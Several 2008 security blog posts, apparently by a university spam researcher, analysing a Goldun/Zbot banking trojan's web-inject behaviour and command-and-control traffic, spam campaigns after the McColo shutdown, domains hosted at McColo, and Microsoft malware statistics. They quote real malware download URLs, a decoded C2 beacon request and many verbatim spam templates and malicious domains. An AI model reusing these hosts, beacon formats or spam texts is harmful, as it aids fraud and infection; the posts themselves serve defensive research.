One of my malware analysis students brought this domain to my attention first on October 31st. He was analyzing the copy of the malware which claimed to be an "anjelina" video which we had received on October 27th. That video made contact to the servers "popokimoki.com", "laureselignac.com", "sergej-grienko.com", and "ulm-haafeulm-haa.com".

The malware downloaded a "substitution" config file for banking sites. This banking configuration file seemed to be the type used by the so-called "Goldun Trojan" has been around FOREVER -- at least since January 2005 according to Symantec and McAfee.

The Trojan is called a "High Threat" by PCTools:
http://www.pctools.com/mrc/infections/id/Trojan.Goldun/

although Symantec calls it "Risk Level 1: Very Low".

What's the difference in the risk ratings? I believe its primarily a difference between how hard it is to notice the infection vs. how unwise you would have to be to open a .zip file attached to an email and then execute the program it contains. So, there is a "Very Low" risk that someone is going to receive a .zip attachment promising to be a sex video, unpack the zip file, and then run the attached executable. The malware is VERY widely detected, which means even if you were foolish enough to do that, there is a really great chance that the virus would be detected at execution time.

The problem comes in that if you actually DO get infected, you are quite likely to have a severe impact in the form of identity theft, and because of the root-kit technologies implemented in this virus, you won't know you are infected because the virus hides itself from common commands.

We'll look at some of the network traffic from the October 27th version of the anjelina_video.exe and the November 11th version of the obama_video.exe.

The anjelina video is detected almost uniformally as being "Zbot"

The Obama video is detected by a host of names, including "Haxdoor", "Goldun", and GoldSpy" -- Haxdoor (eTrust, Ikarus and Microsoft), Goldun (NOD32, Panda, PCTools), and GoldSpy (DrWeb).

However, our experience is that they both contact the same servers and both do mostly the same thing.

When the anjelina_video was executed, it fetched the file:

http://ulm-haafeulm-haa.com/blotch/1010.bin

and made frequent contacts to the site:

http://sergej-grienko.com/e-bolt/data.php

The .bin file sure looked like a Goldun configuration file to me, so we visited Citibank.com, and sure enough, considerable data about where we had just visited, including our OS, browser, screen resolution, and other information, was sent to sergej-grienko.

The commands used a "trackid=" tag to pass an encoded string of information, such as:

GET /e-bolt/data.php?trackid=706172616D3D636D64266C616E673D454E552669643D37343230267368656C6C3D3026736F636B73706F72743D30267665723D392668747470706F72743D3026757074696D656D3D323726757074696D65683D31267569643D5B43363635454438323642364638413346385D HTTP/1.0

which translates to:
param=cmd&lang=ENU&id=7420&shell=0&socksport=0&ver=9&httpport=0&uptimem=27&uptimeh=1&uid=[censored]


While the Anjelina malware fetched a data file

The Obama_video fetched a data file called:

http://sergej-grienko.com/inj/0611nociti.bin

We set up a working theory that the ".bin" file was being named for the data of its creation, European style, so that the "1010.bin" was created October 10th, the "0611nociti.bin" was created on November 6th. This seemed to be confirmed when on November 11th, the file being downloaded switched to "1111.bin".

What was the purpose of the .bin files?

When visiting websites, the ".bin" file was consulted at each URL to determine whether the URL typed in the browser matched a URL pattern in the configuration file. If there was a match, the webpage was then searched, before displaying to the user, to see whether a particular pattern ON THE FETCHED WEBPAGE was found. If that pattern was found, then additional information was inserted into the webpage.

Using the November 11th configuration file, we took "infected vs. clean" screenshots while visiting 32 different banking login pages that were found in the configuration file. In 28 of the cases, the webpage on the infected computer asked the user to provide additional information while logging on.

All of the information provided (and much more data as well) was stored in a keylog recording file, which was periodically sent to the hacker.

Here are some example "Before and After" pictures. The banks that were tested included:

(53) Fifth Third Bank
Bangor
Bank of America
Bank of Hawaii
Bank of the West
BB&T
California Bank
Capital One
Citizens Bank
East West Bank
First American Bank
First American Trust
First Bank
First Business
First Citizens
First Merit Bank
First Niagra Bank
Frost Bank
Huntington Bank
M&T Bank
Metro National Bank
National Bank of Arizona
PNC Bank
Regions Bank
TD Bank North
WAMU
Webster Online

Image clean-up and sizing underway. Full images of all are available by request to law enforcement and qualified researchers as part of the full report on this subject
















Saturday, November 15, 2008

Post McColo Spam - What do we see?

On the evening of November 11th, the McColo network was "de-peered" and lost access to the Internet. Since that time, those who have unfiltered spam sources are seeing a dramatic decrease in spam. At the UAB Spam Data Mine, on November 12th, November 13th, and November 14th, we had our three lightest spam days in the past year, with a three day daily average 65% below the previous 30 day daily average.

A shout out here to the guys at FireEye, who helped document why the Srizbi botnet was not able to come back online. Several people have said "I can't believe the criminals didn't have a backup plan coded into their bot!" Well, it turns out they did, as FireEye documented in their entry "100,000 Srizbi IPs detected in 24 hours". It turns out their were four unregistered domain names coded into the bots. When McColo's shutdown became imminent, someone (not sure right now if it was FireEye) registered the domains before the criminal could. As a result, FireEye is able to watch the Srizbi bots ATTEMPT to contact their backup, but since the criminals don't own those domains, the attempt fails, and the bots sit idle, wondering what to do next.

So what the the OTHER spammers doing in the meantime? Let's look at the spam we received on Thursday, November 13th at the UAB Spam Data Mine.


Its still primarily about pills. 56% of our spam falls into 6 spam groups - not sorted by Botnet, but by the "look and feel" of the spam, its email body, its subject lines, or its website hosting.

20% - My Canadian Pharmacy - Subjects = single word greeting
13% - Canadian Pharmacy - Subjects = price and quantity of pills
8% - Canadian Pharmacy - random mis-spelled words in body
6% - Canadian Pharmacy - MSN Featured Offers spam
6% - Penis Enlargement Patch
3% - Canadian Pharmacy - Hall of Shame

In addition to these there were six other Canadian Pharmacy spam groups, all tiny, a new "BigPRX" enlargement spam, and small campaigns for US Drugs and Canadian Health and Care Mall.

I'll share some details about all of them below.

Besides those, our other "large spam campaigns" are:

5% = Russian Chat Girlfriends and wives . . .
4% = call 1-305-390-0269 to get a diploma . . .

While no other spam groups comprised more than 1% of our spam on this day, I also wanted to note our two biggest malware items of the day:

United Postal Service tracking number malware . . .
Fake airline tickets malware . . .




The largest single campaign still spamming is for "MyCanadian Pharmacy". The My Canadian Pharmacy campaign accounted for 20% of all of our spam on November 13th!

The spam messages only contain a URL. No message of any type.

The only domains in this group were:

tubdyqwenqe.com
wudvospewy.com

The subjects are also extremely simple:

Aloha
Ave
Greeting
Hallo
Hello
Hey
Hi
Regards
Salute




There are at least nine distinct spam templates that are sending us Canadian Pharmacy spam.



13% of our spam comes from a Canadian Pharmacy Template H:

This campaign has spam subject lines which combine a pill name, a price, and a quantity of pills, randomly selected, like these:

$99.95 Viagra 100mg x 30 pills buy now
$129.95 Viagra 100mg x 60 pills price
buy now Viagra (Sildenafil) 100mg x 90 pills $159.95
Price for 50mg x 60 pills $2.00 per pill
etc.

The domain names in this group are:

chicagofamilyhealth.com.es
chinanewmed.com.es
chinatakecare.com.es
christianfamilymed.com.es
christianfamilyx.com.es
christianxshealth.com.es
churchgoodhealth.com.es
cityxsite.com.es
classydoc.com.es
coasttwenty.com
coolroproject.com.es
cooppharmdirect.com.es
cornerpharmshop.com.es
tieprocess.com

The bodies of the emails follow the same template as the subjects . . . a random dose, quantity and price, followed by a URL, such as:

50mg x 60 pills US $ 2.00 Per Pill
http://coasttwenty.com




8% of our spam comes from Canadian Pharmacy Template A:

In this email template, random words are mis-spelled throughout the email, but the basic message is the same:


If you are tired of ovërpaying for meds, and overpaying for visits to the Doctors -

If you need to get the prescriptiõn. fi|led without hassle and iinconvenience -

Here is your solution : the world's most trusted Ïnternett Önlinee Meds Stôre.

Carrying þopular meds at incredibly low príces, suchh as

- Magic Blue pill (from just $ 1) Via and Cia
- Soma (for your päin relïef) - from just $ 0.60
- Tramadol (for your pãin relief) - justt $ 2
- And thoûsands more differentt meds for all conditions

Recommendêd by Canadiann Health cãrè Professionals and by thousänds of satisfied cùstomers world wide

http://krnnlkb.cn


This template uses the domain names:

luwucos.cn
rrgsahe.cn
czassqz.cn
uoqorks.cn
djmoloq.cn
xzbuagd.cn
wvzupin.cn

and the subject lines:

0nline Discount Pharmacy
A Licensed drug store, best meds online
Advantages of online pharmacies
Affordable Meds
Amazing and cheap online pharm
Best Pharmacy is dedicated to being your best resource for
buy cheap pharm drugs
Cheap Meds from USA
Compare and Save on Generic Meds ! Valium @ $25. Xanax
Convenient, discreet online pharmacy
Discount Internet Pharmacy - FREE Prescriptions Written
Drugs for confidents! Great offers
Find your medication in our internet Pharmacy
Forget the doctor, get meds online
Fw: Meds. Online, Valiu0m, Xana0x, Viagr0 and many more
Fwd: Get All Meds. Any Meds You Want Prescripts Written
Fwd: Order Anti-depressants, weight loss meds
Fwd: special meds for you
Internet Pharmacy - Cheap Prices
Licensed online pharmacy! Best prices
Look for 50% discounts on meds
Looking for Meds? Cheapest Pharm is Here
Meds approved by us approved doctors. Pnterm.in, Va|l|ium
New Internet Pharmacy
Offshore pharmacy, save huge on meds!
Online Pharmacy - Viagra, Xenical & More - Lowest
Online Pharmacy with all your prescription
Order Meds Direct NOW
Pharmacy - No doctor visits
Pharmacy - No prescription required
Save $$$ with our Internet Pharmacy
Save on Generic Meds! Xanax # $35. Valium
This low pricing on meds provided on our site.
Thousands of customers, meds online
Unbelievable Savings on Generic Meds!! Valium @ $25. Xanax
Verified You Ordered Meds
Want your love back?? Check it out
You can order Anti-depressants, weight loss meds,and pain



3% of emails were from Canadian Pharmacy Group B uses different emails which look like this:


What's your HALL of SHAME?

The fast way to solve your most embarassing aiments. Humiliating? Yes. Depressive? Yep. What to do? Visit our site for the most effective solution.

Top female problems and how to solve them.

If you ever been suffering from most known male problems and could not find a good soluion, or dont't like with your present results, visit our site to get the most up-to-date information on problems and the ways to treat them.

Make your way here & Save Today! http://www.legacywhen.com


Domains in this group are:

legacywhen.com
progressfast.com

Subjects in this group are:

10 secrets to good family night life.
7 intimate Relationship Problems and How to Solve Them
Dont let your tiny male problem grow into a disaster.
Dont turn your marriage into disaster, use male enhancers.
How to solve your everyday male problems
How to solve your marriage problems with enhancers.
If your wife became cold, light the fire in her again with female enhancers.
If your wife needs your attention, you can help her anytime.
IT is the modern, fastest and safest way to solve all your male problems.
Looking for ways to solve male, financial and family problems?
Secret to young-looking skin.
Solutions For Embarrassing Male Troubles.
Time to move to next level in your enhancing process.
Top males problems and ways to avoid and cure them.
You search for perfect xxxlife is over.



6% of our spam on November 13th was from spam templates which pretended to be an "MSN Featured Offer". There are actually several different spam sending patterns in this group, but each have this text in common:


About this mailing:
You are receiving this e-mail because you subscribed to MSN Featured Offers. Microsoft respects your privacy. If you do not wish to receive this MSN Featured Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe you from e-mail communications from third-party advertisers that may appear in MSN Feature Offers. This shall not constitute an offer by MSN. MSN shall not be responsible or liable for the advertisers' content nor any of the goods or service advertised. Prices and item availability subject to change without notice.

©2008 Microsoft | Unsubscribe | More Newsletters | Privacy

Microsoft Corporation, One Microsoft Way, Redmond, WA 98052


Despite a group of "financially oriented" subject lines, most of these spam messages still redirect to Canadian Pharmacy.

More than 60 domain names are used by this group:

advocacyquick.com
alsocondition.com
aspirationcall.com
bazuuvq.cn
beatwhich.com
betweeninterest.com
brotherstay.com
centuryfrom.com
controlwhile.com
coolorgan.com
cornwit.com
couragemine.com
creaseverb.com
dayriver.com
doesonly.com
enoughdress.com
enoughimagine.com
evyulig.cn
feltnotice.com
gatherwife.com
grewselect.com
gtnnubu.cn
happinessverb.com
holdbottom.com
iceeast.com
imaginecool.com
ingenuitysmile.com
integrityhappy.com
integritywash.com
integrityweek.com
longhundred.com
magnetrecord.com
marketdiffer.com
methodprosperity.com
motivationwhy.com
mountainsaid.com
ofbowly.cn
omoogci.cn
pamaohv.cn
pathreply.com
persongenerosity.com
pleaseturn.com
progresssecond.com
quietboth.com
realizationcame.com
reciprocityhigh.com
redanger.com
servebody.com
severalmix.com
spellhim.com
spiritualityplanet.com
stationexperience.com
teethmotivation.com
thoughjoin.com
townaspiration.com
townimagine.com
txzbjwt.cn
untiltradition.com
usualnumeral.com
valleyyes.com
varythey.com
whatnumeral.com
windtoward.com
writewonder.com

Three distinct subject groups are using this pattern, but all currently point to Canadian Pharmacy websites, including the financial group with subjects like:

/Accounts banker!/
/Annual credit/
/Bank report/
/Credit report/
/Economic report/
etc.

A second group of subjects has more than a hundred full sentence subjects, such as:

RE: A completely natural way to give up smoking.
RE: A new source of life power has been discovered!
RE: A pimple?two pimples?three pimples? They do not leave you? Repulse them!
RE: A pimply guy attracts negative attention? don?t be one of them!
RE: A portable mortar for any disease you might catch.
RE: A single pill may bring out the beast in her!
RE: A single pill raises the immunity a dozen times!
RE: Additional help in building body of your dream.
RE: Afraid of epilepsy? Seizures are not thread anymore.
RE: Almost all men after 40 suffer from it
RE: Amoxicillin. A word that scares bacterial infections.
RE: Annoyed by the new car of a friend? Take a debilitant and buy a better car!
RE: Are you afraid of traveling by plane? Try new reliable medicine!
RE: Bare no morning after headaches in the morning.
RE: Be sure to get enough Zinc for your organism work.
RE: Be the boss in the game. Control your ejaculation.
RE: Become a sophisticated perfume shell adore your talent!
RE: Bring your senses to new level using lubrication.
...
RE: You are growing bald? Here is the answer!
RE: You are the one to set up the rules for that game.
RE: You are young and strong but helpless in bed? There is a way out!
RE: You shouldn?t suffer when the remedy is available!
RE: You sweat all the time? Lose some weight!
RE: You would look awesome without those extra kilos!
RE: Youll appreciate the new antibiotic at its true value!
RE: Your doctor prescribed you a medicine but you dont know where to buy it?


While a third group of subjects has two letters, followed by a Doctor's name, such as:

RE: bw.Doctor Nelson
RE: ja.Doctor Otto
RE: kc.Doctor Lyle
RE: kq.Doctor Emory
RE: kv.Doctor Josue
RE: lb.Doctor Darren



The Penis Enlargement Patch spam uses the following subject lines:

Amazing growth in just weeks
Bring her to seventh heaven
Don't settle for less than 9 inches
Easiest way to gain mass
Endorsed by healthcare professionals worldwide
Enlarge, Widen and Strengthen
Explode her mind with pleasure
Gaining inches the easy way
Grow thicker, harder and longer
Make her desire you
Make her moan with pleasure
Make your friends envious
Power up your package
Proven to enlarge and lengthen
Put on inches instantly
Re: Breakthrough formula for men
Re: don't wait to be huge
Re: Rock hard and huge
Re: watch her come over and over again
Sharon loved the results I got from this
The only formula for men that works
The secret to making her come
The truth behind 9 inches
The ultimate male package
What every woman wants from their man

The websites used by Penis Enlargement Patch are:

http://aafkgina.cn/
http://agolate.com/
http://agolate.net/
http://ahtaffc.cn/
http://bebolgf.cn/
http://cajlobs.cn/
http://cajpirx.cn/
http://fepolai.com/
http://fnicrami.cn/
http://ftebgao.cn/
http://grazilp.com/
http://grazilp.net/
http://grptice.cn/
http://hlidona.com/
http://hligeob.net/
http://kojpige.net/
http://laeicyo.cn/
http://locterb.cn/
http://oehfikal.cn/
http://omridek.com/
http://omridek.net/
http://rvoninnq.cn/
http://sedojji.cn/
http://sertiku.net/
http://uspebuo.net/
http://vseunik.net/

Like one of the Canadian Pharmacy groups, the email body uses randomly inserted mis-spellings to try to avoid spam filters. Here's an example:

A top team of British scientists and medical dõctors have wórked to deveIop the statee-of-the-art Peñis Enlargemeent Patch delivery system which automatically increases penis sizee up to 3-4 fulll inches.

The patches are the eàsieèst and most effectïve way to inçréase your penis size.

You won't have to take pills, get under the knifee to perform exþensivê and very painful surgêrÿ, use any pumps or other devices.

http://agolate.net/

No one wïlll evér find out that you are using our product.

Just aåpply one patçh on your body and wear it for 3 dayss and you will startt noticing dramatic résults.

MiIlions of men are taking advantage of thiss rèvolutionary new produçt - Don't be Ieft bëhind!

http://agolate.net/

Wednesday, November 12, 2008

Unprecedented Drop in Spam

Would you like to know exactly what time the peering providers for McColo pulled the plug? Its not hard to tell if you watch spam volumes. Brian Krebs, from the Washington Post, has been using his most excellent blog Security Fix to lead a public awareness crusade against some of the dirtiest Internet Landfills on the web. His journalistic efforts lead to the breakup of the Russian Business Networks, the closing of InterCage, the ICANN order against EstDomains, and most recently, the closing (at least for now) of McColo.

We know that in the long term such actions might be nothing more than turning on the light -- the roaches scatter, but resume their business somewhere else. The point is to set an example which, if enough people follow after it, will continue to bring inconvenience and expense to the spammers no matter where they resume their operations.

But for the moment, let's celebrate the possibly temporary drop in spam.

This morning at the UAB Spam Data Mine our spam volumes are decreased from normal volumes by between 65% and 70%! What happened? And can we make any generalizations from today's events?

Very little, if any, spam is actually sent from McColo. Why the shutdown of the McColo network had such a profound impact on spam is that the "Command & Control" servers for many of the world's largest spam-sending botnets resided at McColo. This exercise has shown what we have been arguing all along at UAB -- it is important to find out not just what TYPE of spam is being sent, but HOW it is being sent. I have to say I am even more excited than before about identifying the points of control for some of these other spam-sending botnets.



By isolating the McColo network (the proper term is "de-peering"), the Criminal can no longer update the server where the Botnet machines received their commands. If the bots can't find their controller, they complete their current task, and sit idle, testing from time to time to see if they can reach their Command & Control server. Until they can, they won't have any more spam to send.


Let's look at the immediate impact today of the spam-sending roaches who have been inconvenienced by the McColo shutdown.

There are several places that provide real-time or near real-time graphs of the volume of spam they are seeing. Let's look at a few of them.


(click for current MxLogic Threat Level)

MxLogic.com has been showing spam to be between 83.5% and 91.1% of spam for the past week. Yesterday between 1:00 and 4:00 spam dropped from 85% of their monitored mail volume to 71.93%. Currently they are seeing spam as being 64.1% of their email traffic, which I believe would be the lowest point for the entire year.


(click for current SpamCop Statistics)

SpamCop.net normally sees as many as 30 or 40 spam messages per second, and looked at more than 14 million spam emails in the past week. Yesterday spam dropped abruptly from 30 messages per second to around 8 messages per second, and currently spam volumes have not yet crossed the 15 message per second mark for the entire day.

Brian Krebs has updated his earlier post with news that he is receiving feedback from all around the globe of people who are seeing less spam today because of the disconnection of McColo.

If you have numbers or charts showing your own spam drop, please share them with me. I'd love to share them with our readers here: gar@cis.uab.edu

Internet Landfill: McColo Corporation

Brian Krebs has turned his sights on another Internet Landfill, this time the McColo Corporation. Today his column is titled: Major Source of Online Scams and Spams Knocked Offline. Later this morning, the Washington Post ran a longer story on the topic, Major Source of Internet Spam Yanked Offline: Web Hosting Firm Shuttered After Connection to Spammers is Exposed He mentions in the column that he has been researching McColo for several months, and that when he contacted McColo's upstream providers, Global Crossings and Hurricane Electric, that something interesting happened.

Hurricane Electric's Benny Ng told Krebs:

"We looked into it a bit, saw the size and scope of the problem you were reporting and said 'Holy cow! Within the hour we had terminated all of our connections to them."

Although Global Crossings declined to give Krebs a comment, apparently Krebs has once more accomplished what the entire rest of the security world has been unable to do -- removing another Internet Landfill from the world wide web.

I coined the term "Internet Landfill" in a presentation regarding Krebs earlier amazing work almost single-handedly removing Intercage from the Internet. I explained it by saying:

Every house has a trash can, and every business has a dumpster. There's a little garbage anywhere you look. But when someone buys the land in your neighborhood and decides to make it a garbage dump, or a landfill, usually the citizens in that neighborhood protest. Some places on the Internet, such as Intercage, exist solely to store filth, malware, and crime. Those places should be treated like "Internet Landfills", and their neighbors should rise up and protest their presence in their neighborhood.


In case anyone has a question about what type of organization McColo is, here is a little fact-finding adventure, using the excellent Reverse IP Tools from DomainTools.com, and the ASN information from CIDR-Report.

McColo's Autonomous System Number is AS26780.

At this time, Hurricane Electric is no longer listed as an upstream, but Global Crossing *IS* still showing a listing, connecting AS3549 (GBLX) to AS26780(MCCOLO).

The Netblocks currently published as being at McColo are:

208.66.192.0/22
208.72.168.0/21

All their other netblocks are strangely missing.

(See: http://www.cidr-report.org/cgi-bin/as-report?as=as26780)

All of McColo's "Business" webpages were on the server 208.66.192.100. That IP resolved McColo.biz, .com, .info, .net, and .org.

None of those domain names are currently resolving.


Moving through their Class C addresses . . .




208.66.193.* previously had four major domains:

proxyspy.biz
audiobookss.com
authorstore.org
gente.ru

None of those domain names are currently resolving.




208.66.194.* previously had 94 domain names. Just choosing from a few . . .

bestincestfamily dot com (registered at ESTDomains)
bestincestmovies dot com (registered at ESTDomains)
cheapincestpics dot com (registered at ESTDomains)
eliteincestsite dot com (registered at ESTDomains)
teenincestpics dot com (registered at ESTDomains)

None of those domain names are currently resolving.




208.66.195.* previously had domain names. Again, just choosing a few...

protect-access dot com (registered at ESTDomains)
downloadcopy dot com (registered at ESTDomains)
pantyhosefiesta dot com
wm-chance dot net

The pantyhose sites have been moved already to "Sago Networks, LLC".
WM-chance has also been moved to Sago (November 12th) but is not yet operational in its new location. Its a Russian language online lottery winning site. Some of the other sites in this group show signs of being "in the process" of moving.




207.72.168.* previously had 1,183 domain names. Again, just choosing a few...

Megacaptcha dot biz (registered at EstDomains)
CaptchaToMoney dot biz (registered at EstDomains)
Torrentpump dot com (registered at Directi)
FtvInnocentAngels dot net (registered at EstDomains)
Coastal-health dot com (registered at OnlineNIC, Inc)
Canadianpharmacycorp1 dot com (registered at Xin Net)
Canadianpharmacycorp2 dot com
Canadianpharmacycorp3 dot com
Canadianpharmacycorp4 dot com
(through 10)
Onlinepharmacysolutions-a dot com (registered at Directi)
Onlinepharmacysolutions-b dot com
Onlinepharmacysolutions-c dot com
Onlinepharmacysolutions-d dot com
Rxmania dot com (registered at GoDaddy)
Pay4pills dot com (registered at GoDaddy)
Asc-antispyware dot com (registered at Beijing Innovative)
A-pennystock dot com (registered at GoDaddy)
Incest-rape dot com (registered at GoDaddy)
Little-gays dot com (registered at EstDomains)
Allyoungmovies dot com (registered at EstDomains)
Smallpussy dot name (registered at EstDomains)(*1)
nymphets dot name (registered at EstDomains)
LittleCuties dot name (registered at EstDomains)

*1 - received 19,317 visitors per month according to Compete.com

None of the sites in this group are currently resolving.




208.72.169.* had 118 domains registered.

Angelgirlspic.com
Searchportalsite.com

Emailru.info
Emailrus.info
Mailfreedom4u.net
Mailblogal.info
Quickmailbox.info
Ruslandmail.info

DomainsUAgroups dot com

and some NOTORIOUS nameserver domains, which are said to belong to Leo Kuvayev, such as:

Jioketinjdesapionkderunjsa.com
Kedfinhderionkadesunpas.com
Vertunhandesikolasderun.com

None of the sites in this group are currently resolving.




208.72.170.* has 22 domain names, including:

cinema4free dot com
flashbill dot net
inc-rep dot biz
asapload dot com
theypay dot biz

playpokeronline-casinos dot com
gamble-poker-holdem dot com
texasholdem-vip dot com

None of the sites in this group are currently resolving.




208.72.171.* has only 4 domain names:

br-ladies dot com
ru-ladies dot com
kharkovblacklist dot com
uapeople dot com




208.72.172.* has 132 domain names. Most all of them have the word "sex" in the title of the domain name. Many of them have been used to fill blog comment and address books with "SEO spam" (Search Engine Optimization spam), such as the domain:

NicoleHDUncut dot com which has over 19,000 websites pointing back to it, mostly in comment spam.

Pornntube dot com
Sexntube dot com
Tubepornporn dot com
Just-sex-2008 dot com
Hot-girl2008 dot com
FtvHeavenFemme dot net
GoGetFreePorn dot com

clsoft dot net <== encryption software, makers of "cl secrets keeper" and "cl private disk"




208.72.175.* has 12 domain names:

dreamsservices dot com
FianceeOnline dot com
Rudreams dot com
Ukrainefiancee dot com
etc.

None of these sites are currently resolving




Is this the end of McColo? Probably not. Like the Intercage fiasco, we will probably see loud and public outcries of discrimination followed by mournful apologies and promises to do better, each accompanied with a short-lived resurrection, which will terminate again as soon as the new providers understand what sort of filth they are accomodating, and how the Neighbors (that's you and I, folks) feel about having this trash on OUR Internet.

Tuesday, November 11, 2008

Microsoft Reveals Malware and Spam Trends

This week Microsoft has released their "Microsoft Security Intelligence Report 5". Like the previous volumes, this report gathers spam and malware information gathered by Microsoft's security-related teams for one half year, in this case January through June 2008. The 150 page report is described as "An in-depth perspective on software vulnerabilities and exploits, malicious code threats, and potentially unwanted software, focusing on the first half of 2008".

The report shows that vulnerability disclosures by software vendors was down in 1H08, 4% less than 2H07 and 19% less than 1H07, however the percentage of vulnerabilities which were rated as "High" has increased 13%, so that 48% of all new vulnerabilities received a "High" threat rating from the Common Vulnerability Scoring System.

While we worry about vulnerabilities to hacking, one trend that is troubling is that more "data breaches" occurred due to Stolen Equipment (37.2%) than Hack Attacks (23%). We need to continue to stress proper data classification in all organizations, and then proper data handling based on that data classification.


Browser Vulnerabilities



Vista came out with high marks compared to its predecessor Windows XP. Microsoft vulnerabilities accounted for 42% of Browser exploits on XP computers, including 5 of the top 10 Browser exploits, but only 6% of the Browser Exploits on Vista were related to Microsoft products, or 0 of the top 10.

One very interesting trend revealed by the report is that hackers continue to target particular geographies. Chinese computers were twice as likely as American computers to be a victim of a Browser-based exploit -- in part because of Chinese-market toolbars which contained vulnerabilities, such as the BaoFengStorm vulnerability and the BaiduToolbar vulnerability. Chinese computers accounted for 48% of the browser based exploits, followed by 23% for American computers. Russian, Italian, British, Spanish, French, Turkish, German, and Korean trailed.

This would be an opportunity to stress the importance of timely installation of browser patches. Even though the report was for the first half of 2008, the top exploited browser vulnerabilities from the Microsoft family were:

MS06-014 (MDAC_RDS)
MS06-071 (MSXML_setRequestHeader)
MS06-057 (WebViewFolderIcon)
MS06-067 (DirectAnimation_KeyFrame)
MS06-055 (VML)

The top exploited non-Microsoft vulnerabilites for 1H08 were:

CVE-2007-0015 (Apple_Quicktime_RTSP)
CVE-2008-1309 (RealPlayer_rmoc3260_Console)
CVE-2007-3148 (Yahoo_WebcamViewer_ActiveX)
CVE-2006-5198 (WinZip_CreateNewFolderFromName)
CVE-2007-5601 (RealPlayer_IERPCtl)


Spam, Spam, Spam, and Spam



One great graphic in the report on page 67, shows the percentage of blocked spam by category.



(click to visit the Microsoft Exchange Hosted Services webpage to learn more)

Spam Categories (1H08 Microsoft Percentage given, and how we see the trend now at the UAB Spam Data Mine . . .)
(30.6%) Pharmacy-Sexual -- UP!
(20.9%) Other Pharmacy -- Slightly Down
(19.9%) Non-Pharmacy Product Ads -- DOWN
(9.6%) Stock -- DOWN - almost non-existent
(8.6%) Dating/Sexually Explicit Material -- SIGNIFICANTLY UP
(3.8%) Gambling -- UP!
(2.5%) Phishing -- Constant
(1.9%) Fraudulent Diplomas -- Down
(1.1%) 419 Scams -- Constant

To me this graphic could be labeled, "How Law Enforcement Should Spend Its Spam Fighting Resources". 51.5% of the spam Microsoft blocked during 1H08 was advertising pills! Whoever wants to take that on, please shoot me an email. We want to help. gar@cis.uab.edu


Malware


The most prevalent malware family is described in the report as being "not especially notable from either a technical or a social-engineering perspective, Win32/Zlob deserves attention due to the sheer magnitude and persistence of the threat". The malware family has lead the pack in number of infections since 1H07, and it continues to be removed by Microsoft security products more than twice as often as any other threat - around 9 million times in the first half of 2008.

Rather than recreate the entire geographic report, I thought it would be interesting to show the great difference between the Cyber Threat Experience in different geographies according to the Microsoft data.

In the United States, the top threat category was "Trojan Downloaders and Droppers" - those tiny files often encountered as "drive by infectors" on webpages whose only purpose is to download and execute additional commands. In the US, this accounted for 45.7% of the threat landscape, but in Brazil and China it was only 6.5%, while in Germany it was 39.5%. (NOTE: This is not saying 45.7% of US machines had a Trojan dropper -- this is saying 45.7% of the machines which came to Microsoft's attention as having been infected had a Trojan dropper on them.)

In the United States, only 8.4% of the threat landscape in 1H08 was made up of machines that had a Backdoor installed on them. But in Korea 14.9% of compromised machines had a Backdoor, and in Italy the number was 16.8%!

We'll run through the other categories, comparing the United States to China, Brazil, Germany, and "The World":

Trojan/Dropper:
US (45.7%) China (6.5%) Brazil (6.5%) Germany (39.5%) World (31.7%)

Other Trojans:
US (30.7%) China (22.2%) Brazil (8.2%) Germany (23.2%) World (23.9%)

Adware:
US (21.1%) China (8.3%) Brazil (9.7%) Germany (25.7%) World (20%)

Other Potentially Unwanted Software:
US (23.6%) China (43.8%) Brazil (11.6%) Germany (24%) World (25%)

Worms:
US (5.5%) China (10%) Brazil (11.6%) Germany (3.7%) World (11.3%)

Backdoors:
US (8.4%) China (9.9%) Brazil (3.7%) Germany (8.8%) World (9.2%)

Password and Monitoring Tools
US (2.5%) China (23.4%) Brazil (62.1%) Germany (1.7%) World (8.5%)

Viruses:
US (1.7%) China (3.1%) Brazil (2.3%) Germany (2%) World (3.3%)

Spyware:
US (1.5%) China (3.8%) Brazil (.5%) Germany (.7%) World (1.8%)

Exploits:
US (1.6%) China (.3%) Brazil (.1%) Germany (.8%) World (1%)



Another Key -- how many machines were found to be infected in the US vs. other parts of the world? That is, how many computers had SOMETHING removed by the Malicious Software Removal Tool?

United States 2H07 (8.9%) 1H08 (11.2%) +25.5%
Brazil 2H07 (13.2%) 1H08 (23.9%) +81.8%
China 2H07 (4.7%) 1H08 (6.6%) +41.1%
Germany 2H07 (4.4%) 1H08 (5.3%) +19.7%

One question about what those numbers mean though -- is this an indication that computers in the US are twice as likely to be infected as computers in Germany? Or is this an indication that computers in the US are twice as likely to be running the Malicious Software Removal Tool than computers in Germany?

Specific Geographies


The second half of the report is dedicated to giving specific numbers of computers for which Microsoft tools detected and cleaned various categories, which answers the question immediately preceding.

Some key findings in our chosen "comparison countries":

Brazil

"The threat landscape in Brazil is clearly dominated by malware. The top four families in Brazil are all malware families". In Brazil, 1,294,084 machines had "Other Trojans" removed from them, while 246,470 machines were infected by "Worms".

The Top Families in Brazil were:
Win32/Bancos - 894,666 infections (a "banking Trojan", capturing banking credentials and targeting specifically Brazilian banks, in some cases able to alter transactions)
Win32/Banker - 359,933 infections (a "banking Trojan")
Win32/Rjump - 130,488 infections (a "USB-jumper" Worm)

China

32.5% of the computers in China are infected with "Other Potentially Unwanted Software", which can't be categorized as adware, spyware, or malware, but is still probably criminal - such as rogue security software which is purchased from criminals and has no effect on the installed computer. Almost 700,000 computers in China had Password Stealers installed on them, with Win32/Frethog and Win32/Ceekat being the biggest installations.

Only 1 of the worldwide Top 10 malware families is present in China. (Win32/Rjump, the USB jumper that was so prevalent in Brazil ranked #7 in China).

Germany

More than 500,000 computers in Geramny had a Trojan/Dropper installed. Malware rate has increased 19.7% in Germany since 2H07. Adware was Germany's #2 threat, with 327,000 computers having Adware installed, which is a 79.6% increase over 2H07. Zlob was the top "Dropper" with 427,563 installs cleaned, while ZangoSearchAssistant was the top Spyware, with 130,770 installs removed.

United States

11.2% of US computers had software cleaned by the Malicious Software Removal Tool. This is a 38% increase over 2H07. 7,044,340 computers had a Trojan/Dropper, while 5,014,874 computers had an "Other/Trojan". 3.5 Million had "Other Potentially Unwanted Software", 3.3 Million had "Adware" and 1.3 Million computers had a backdoor. 847,972 were infected with a Worm, and 265,038 had Password Stealers active.

The "Other Trojan" numbers account for a 52.6% increase from 2H07.

Monday, November 10, 2008

Election Malware and Obama Pill Ads?

Just a quick post to update the situation we described in our previous posts that we are now thinking of as Election Malware Round One and Election Malware Round Two. Round One was the Obama Acceptance Speech video and Round Two was the McCain video. Technically, I guess that means we are currently looking at Round Two B, since the webpage hasn't changed - we just have a fresh batch of domain names.


